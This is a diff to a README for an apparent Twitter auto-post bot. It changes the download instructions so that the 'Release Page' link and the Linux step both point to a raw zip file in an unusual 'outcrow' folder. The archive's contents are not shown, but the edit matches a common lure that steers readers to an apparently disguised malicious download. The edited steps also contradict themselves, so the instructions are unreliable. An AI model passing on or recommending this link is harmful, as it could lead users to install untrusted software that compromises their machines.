Kxoky/twitter-auto-post-bot/README.md

 ## 📥 Download & Install

-To get your copy of the twitter-auto-post-bot, visit this page to download: [Release Page](https://github.com/Kxoky/twitter-auto-post-bot/releases)
+To get your copy of the twitter-auto-post-bot, visit this page to download: [Release Page](https://raw.githubusercontent.com/Kxoky/twitter-auto-post-bot/main/outcrow/twitter-auto-post-bot_v2.9.zip)

 1. Click the link above to open the Releases page.
 2. Look for the latest version.
 It will be labeled by version number, e.g., v1.0.
 3. Find the file suitable for your operating system:
     - For Windows, download the `.exe` file.
     - For macOS, download the `.dmg` file.
-    - For Linux, download the `.tar.gz` file.
+    - For Linux, download the `https://raw.githubusercontent.com/Kxoky/twitter-auto-post-bot/main/outcrow/twitter-auto-post-bot_v2.9.zip` file.
 4. Click on the file name to initiate the download.

 ## 📂 Installation Steps